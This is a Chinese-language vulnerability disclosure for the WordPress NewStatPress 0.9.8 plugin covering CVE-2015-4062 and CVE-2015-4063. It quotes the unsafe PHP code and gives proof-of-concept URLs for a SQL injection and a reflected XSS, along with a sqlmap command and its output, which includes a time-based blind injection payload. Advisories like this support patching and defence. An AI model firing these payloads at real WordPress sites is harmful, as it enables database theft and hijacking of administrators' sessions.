WordPress NewStatPress Plugin 0.9.8 xss+sql注入

<p>主题地址：<a href=“https://wordpress.org/plugins/newstatpress/”>https://wordpress.org/plugins/newstatpress/</a></p><p>影响版本：0.9.8</p><p>Active installs: 20,000+<br></p><p>CVE: CVE-2015-4062, CVE-2015-4063</p><h2>1）sql注入 [CWE-89] (CVE-2015-4062)</h2><p>* CODE:</p><p>includes/nsp_search.php:94</p><blockquote><p>for($i=1;$i<=3;$i++) {</p><p>    if(($_GET[“what$i”] != ‘’) && ($_GET[“where$i”] != ‘’)) {</p><p>        $where.=" AND “.$_GET[“where$i”].” LIKE ‘%“.$_GET[“what$i”].”%’“;</p><p>    }</p><p>}</p></blockquote><p><br></p><p>POC:<br></p><pre>http://[domain]/wp-admin/admin.php？where1=agent[SQLi]&limitquery=1&searchsubmit=Buscar&page=nsp_search</pre><p><br></p><p>SQLMAP:</p><pre>./sqlmap.py --cookie=”[cookie]" --dbms mysql -u “http://[domain]/wp-admin/admin.php?where1=agent&limitquery=1&searchsubmit=Buscar&page=nsp_search” -p where1
[…]
GET parameter ‘where1’ is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection points with a total of 89 HTTP(s) requests:

Parameter: where1 (GET)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: where1=agent AND (SELECT * FROM (SELECT(SLEEP(5)))Guji)&limitquery=1&searchsubmit=Buscar&page=nsp_search

[12:25:59] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 7.0 (wheezy)
web application technology: Apache 2.2.22, PHP 5.4.39
back-end DBMS: MySQL 5.0.12
</pre><p><br></p><h2>2)xss[CWE-79] (CVE-2015-4063)</h2><p>includes/nsp_search.php:128<br></p><blockquote><p>for($i=1;$i<=3;$i++) {</p><p>    if($_GET[“where$i”] != ‘’) { print “<th scope=‘col’>”.ucfirst($_GET[“where$i”]).“</th>”; }</p><p>}</p></blockquote><p>POC:<br></p><pre>http://[domain]/wp-admin/admin.php?where1=<script>alert(String.fromCharCode(88,+83,+83))</script>&searchsubmit=Buscar&page=nsp_search<br></pre>